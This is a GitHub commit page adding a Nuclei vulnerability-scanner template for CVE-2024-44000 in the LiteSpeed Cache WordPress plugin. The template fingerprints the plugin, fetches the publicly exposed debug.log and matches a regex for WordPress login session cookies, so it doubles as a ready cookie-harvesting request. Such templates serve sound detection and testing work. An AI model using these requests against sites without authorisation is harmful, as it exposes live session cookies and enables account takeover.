-
-
Notifications
You must be signed in to change notification settings - Fork 191
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Auto Update Nuclei [Fri Sep 20 18:26:09 UTC 2024] :robot:
- Loading branch information
1 parent
8d85915
commit 86667d6
Showing
1 changed file
with
63 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
id: CVE-2024-44000 | ||
|
||
info: | ||
name: LiteSpeed Cache <= 6.4.1 - Sensitive Information Exposure | ||
author: s4e-io | ||
severity: high | ||
description: | | ||
The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default. | ||
reference: | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache/litespeed-cache-641-unauthenticated-sensitive-information-exposure-via-log-files | ||
- https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache | ||
- https://github.com/gbrsh/CVE-2024-44000 | ||
- https://thehackernews.com/2024/09/critical-security-flaw-found-in.html | ||
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2024-44000 | ||
cwe-id: CWE-532 | ||
metadata: | ||
verified: true | ||
max-request: 2 | ||
vendor: liteSpeed-technologies | ||
product: liteSpeed-cache | ||
framework: wordpress | ||
publicwww-query: "/wp-content/plugins/litespeed-cache" | ||
tags: cve,cve2024,info-leak,takeover,wordpress,wp-plugin,litespeed-cache,wp | ||
|
||
flow: http(1) && http(2) | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body, "/wp-content/plugins/litespeed-cache")' | ||
internal: true | ||
|
||
- raw: | ||
- | | ||
GET /wp-content/debug.log HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
part: response | ||
regex: | ||
- "(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)" | ||
|
||
- type: word | ||
part: content_type | ||
words: | ||
- 'text/plain' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
# digest: 4b0a00483046022100f19a325673c860d8a81c667ea93e30c155e68dd1f0cd1379d8a79c9ab4042869022100b1bfddc0d88ac8844e7147f01ec7b5e9f5cb186ecc36d52824aef25bc20f346a:922c64590222798bb761d5b6d8e72950 |